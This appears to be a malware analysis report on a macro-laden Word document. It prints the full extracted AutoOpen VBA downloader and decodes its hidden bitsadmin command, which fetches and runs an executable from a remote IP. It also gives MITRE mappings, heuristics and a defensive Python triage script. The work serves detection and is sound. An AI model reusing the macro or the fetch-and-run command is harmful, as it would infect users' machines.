Verdict: MALICIOUS
Risk Score: 168
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1204.002 User Execution: Malicious File
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1197 BITS Jobs
T1105 Ingress Tool Transfer
The sample is a Word (OLE) document carrying a VBA project with an AutoOpen macro. A content-enable lure talks the user into enabling macros; once they are enabled, AutoOpen builds a command line and runs it with a hidden window. The command string is stored with the junk token So4T9 inserted after every character; the helper function MJCTM strips that token (first with Replace, then a second time with a VBScript.RegExp object, which is the only CreateObject call in the sample) and the result is passed to Shell with window style 0 (vbHide). Removing the token from the string literal in the extracted macro gives:

cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit

So the macro is a downloader: it uses the BITS client (bitsadmin, a signed Windows binary) to fetch a second-stage executable from 93.170.104.98 into %tmp%\~.exe and then executes it. The decoded indicators are the URL http://93.170.104.98/jbmfkjfre.exe, the BITS job name dw, and the dropped path %tmp%\~.exe. Two caveats for the reader: the CreateObject call is used only for deobfuscation, not for networking or execution, and no exploit is involved, since execution depends entirely on the user enabling macros (user execution, not exploitation for client execution). The dozens of Dim, Const and Array statements surrounding the few working lines are dead-code padding intended to defeat string and signature matching; they have no effect on behaviour.
Heuristics (6)

- VBA macros detected [medium] OLE_VBA_MACROS (3 related findings): Document contains VBA macro code.
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script: `Shell nUKaI61f, 0`
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Set SHswlL = CreateObject("vbscript.regexp")`
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that in this sample a VBA project was in fact recovered (macros.bas below, containing Sub AutoOpen), so the "no modern VBA project was recovered" clause does not hold here; treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as a separate execution surface.
- Macro/content-enable lure [medium] SE_ENABLE_LURE: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3927 bytes | 832ad71f3d8616cfee7e21a8a0f1f532fe7356c4a27eb0e09a0bcdeca72cc141 |
Preview script (first 1,000 lines of the extracted script; this sample is 141 lines, two modules concatenated by olevba, shown with analyst comments added on the lines that matter)

```vba
' --- Module: ThisDocument (class module; attributes only, no code) ---
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Module: NewMacros (standard module; all of the logic lives here) ---
Attribute VB_Name = "NewMacros"
' Deobfuscation helper: returns CWDMxZLy with every occurrence of the junk token
' FbIlx removed. Every Dim/Const/Array statement in this function is dead padding.
Function MJCTM(CWDMxZLy As String, FbIlx As String)
Const MiPNInTB = "usher"
Const VoTwTzi = 56413.774156729
ijrJGJ = 27499.72631798
Dim SMBLRBfVb
SMBLRBfVb = Empty
Dim UaeOs
UaeOs = Array()
Dim u6TmeUD
u6TmeUD = 104
ur6AH = Null
cxnTF = "l"
MJCTM = Replace(CWDMxZLy, FbIlx, "")   ' first pass: plain Replace already yields the decoded string
Dim pLTyDvz
pLTyDvz = Empty
pcIlatmCk = Array(230, -196, -2001184018, 42, True)
BnrkBExe = Array(10023, True, 53568, 247)
Dim WDYsMRc
WDYsMRc = 30721.11938915
Dim YzdUxwdTr As Integer
YzdUxwdTr = 6299
Dim lByiA
lByiA = Array()
Const zLddbe = "m"
Dim rIBoSu3Y
rIBoSu3Y = Null
Set SHswlL = CreateObject("vbscript.regexp")   ' the only CreateObject in the sample: a regex object for the second pass
QSdqj = Date
Const NFLd2 = 209
Dim twrPREK As Variant
twrPREK = Array()
Dim u5gdI As Variant
u5gdI = Array(False, "b1bc", 253, 17635, -1034035452)
Const AiUVN = 130
Dim xrO5u As Boolean
xrO5u = False
Dim DtSd2 As Currency
DtSd2 = 24643
TxB7XFd = Array()
SHswlL.Pattern = FbIlx   ' pattern is the literal junk token "So4T9" (no regex metacharacters)
Dim KWqu4PuM
KWqu4PuM = Array(18941)
Const PoTWMJbw = 4611
Const zvcqMHRt = 45690
Dim dBM7m
dBM7m = Array()
Dim Jhkf0ces
Jhkf0ces = 18334
Px3LN = Empty
Dim CP3XeR As Long
Dim QLnSIFu
QLnSIFu = "g"
Dim FjRfK
FjRfK = 37054
Dim lttYOFV As Byte
lttYOFV = 103
Dim hwbE4nQC
hwbE4nQC = 238
Dim HxZaHEuKH
HxZaHEuKH = ""
ZIGd3quHC = Date
efuU1j3i = 19822
CP3XeR = True   ' stored as -1 in a Long; used below as the regex Global flag
IsvteRd = True
Dim xrm3j
xrm3j = 0
Const wwBlWqvE = 32055
Dim YrDaO As Integer
YrDaO = -20549
Dim TQAPu
TQAPu = Empty
XFRbqp6x = False
QvKu9pdc = Array(0, -324123460, True, "-51274", 201, 77, 0)
Const ZLaDNPOM0 = 0
SHswlL.Global = CP3XeR   ' Global = True, so every occurrence of the token is replaced
Dim BShA9 As Long
BShA9 = -652703950
Dim VLlsY
VLlsY = 173
Dim JrF8V
JrF8V = Null
Const YCxJyqzq = -23691
PlVOxYFG = "-31815"
Const QjPYL = 224
MJCTM = SHswlL.Replace(CWDMxZLy, "")   ' second pass: same result as the Replace above
End Function
' Runs automatically when the document is opened with macros enabled.
Sub AutoOpen()
Dim GUEQgl0 As Currency
GUEQgl0 = -4067
Dim wcUbOm
wcUbOm = Array()
Dim gq5z4s
gq5z4s = Array(44415.093361908, -12425, True, "T", "08fd", True)
oUJ1RH = 12730.522629119
Dim SYLDEIEHU As Long
SYLDEIEHU = -1851000800
Dim FtubqlSwF
FtubqlSwF = 194
Const nfYJAbOe = True
dXqA7m = Array(-12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019)
Dim nUKaI61f As String   ' will hold the decoded command line
Const EbPbjMfg = False
Dim ETBwFjm
ETBwFjm = Array()
qHfrpSwZq = -219635906
Dim uj0Cswp
uj0Cswp = 9
Dim kyyXvysya As Variant
kyyXvysya = Array()
nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9")
' Decoded: cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit
AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, -2378)
Dim jQsbW
jQsbW = Date
Dim J8pAjy As String
J8pAjy = "317eed7b"
zHgWO = -2086329278
kpmVq = Empty
BqXpmPanR = True
hRpGYfaRr = -426398108
Const IbHFT = "32500"
G3h5PwT = -13855
Shell nUKaI61f, 0   ' window style 0 = vbHide: the command runs with no visible window
Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, -1868748710, "")
ORSXIMyL = -16892
Dim SGqXR
SGqXR = 16032.845284238
Const OFXiY = 34986.350534212
Dim xQWF3VrvY As Variant
xQWF3VrvY = Array()
dVrztZa = 0
JBwM8 = 14580.854766339
End Sub
```
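As an added example for this report (not the analyzer's code and not part of the sample), the following Python reproduces what MJCTM does and turns an olevba-extracted module into actionable indicators: it finds calls of the form f("<payload>", "<token>") where the token recurs throughout the payload, strips the token, parses the decoded command line for URLs, hosts, environment-relative drop paths and well-known download-capable Windows utilities, and reports the window style of every Shell statement. The regex patterns, the function names (strip_token, find_token_strings, extract_iocs, shell_calls, triage) and the downloader list are this example's own choices; the input is a constructed cut-down of the AutoOpen routine above, with the obfuscated string literal copied verbatim from macros.bas. It generalises beyond this sample to any macro that uses the same junk-token idiom under a different function name or token.

```python
"""Deobfuscate junk-token strings in a VBA macro and pull indicators from the result.

Added example for this report; not code from the analyzer or from the sample.
"""
import re
from urllib.parse import urlparse

# Constructed input: the working lines of AutoOpen copied from macros.bas above,
# without the dead Dim/Const/Array padding that surrounds them in the real module.
SAMPLE_VBA = r'''Sub AutoOpen()
Dim nUKaI61f As String
nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9")
Shell nUKaI61f, 0
End Sub
'''

# f("<long payload>", "<short token>"): the call shape MJCTM is invoked with.
TOKEN_CALL_RE = re.compile(r'(\w+)\(\s*"([^"]{40,})"\s*,\s*"([^"]{1,16})"\s*\)')
URL_RE = re.compile(r'https?://[^\s"\'&|<>]+', re.I)
# %tmp%\~.exe style paths: an environment variable followed by a backslash-relative name.
ENV_PATH_RE = re.compile(r'%\w+%\\[^\s&|]+')
# Shell <expr>, <windowstyle>   (VBA allows an optional Call keyword and parentheses)
SHELL_RE = re.compile(r'^\s*(?:Call\s+)?Shell\s*\(?\s*([^,\n]+?)\s*,\s*(\d+|vb\w+)\s*\)?\s*$',
                      re.I | re.M)
# VBA vbAppWinStyle constants.
WINDOW_STYLES = {"0": "vbHide", "1": "vbNormalFocus", "2": "vbMinimizedFocus",
                 "3": "vbMaximizedFocus", "4": "vbNormalNoFocus", "6": "vbMinimizedNoFocus"}
# Download-capable Windows utilities often abused by macro droppers (this example's own list).
DOWNLOADERS = ("bitsadmin", "certutil", "powershell", "mshta", "wscript", "cscript",
               "regsvr32", "rundll32", "curl")


def strip_token(payload: str, token: str) -> str:
    """Exactly what MJCTM computes: remove every occurrence of the junk token."""
    return payload.replace(token, "")


def find_token_strings(vba_src: str):
    """Yield (function_name, decoded_string) for each f("payload", "token") call whose
    token recurs in the payload. A literal second argument that appears only once or
    twice is more likely a genuine Replace/Split call than junk-token obfuscation."""
    for func, payload, token in TOKEN_CALL_RE.findall(vba_src):
        if payload.count(token) >= 5:
            yield func, strip_token(payload, token)


def extract_iocs(cmdline: str) -> dict:
    """Pull URLs, hosts, env-relative drop paths and downloader binaries out of a command line."""
    urls = URL_RE.findall(cmdline)
    return {
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "dropped_paths": sorted(set(ENV_PATH_RE.findall(cmdline))),
        "downloaders": [b for b in DOWNLOADERS if re.search(rf"\b{b}\b", cmdline, re.I)],
    }


def shell_calls(vba_src: str) -> list:
    """List (argument, window-style name) per Shell statement; vbHide means no visible window."""
    return [(arg, WINDOW_STYLES.get(style, style)) for arg, style in SHELL_RE.findall(vba_src)]


def triage(vba_src: str) -> dict:
    """Run the three steps over one olevba-extracted module and merge the indicators."""
    decoded = list(find_token_strings(vba_src))
    iocs = {"urls": [], "hosts": [], "dropped_paths": [], "downloaders": []}
    for _, text in decoded:
        for key, values in extract_iocs(text).items():
            for value in values:
                if value not in iocs[key]:
                    iocs[key].append(value)
    return {"decoded": decoded, "iocs": iocs, "shell_calls": shell_calls(vba_src)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Run it against the full macros.bas instead of SAMPLE_VBA to get the same result; the padding statements contain no quoted strings long enough to match TOKEN_CALL_RE, which is why a minimum payload length and a recurrence count are used rather than matching on the function name, which changes from sample to sample.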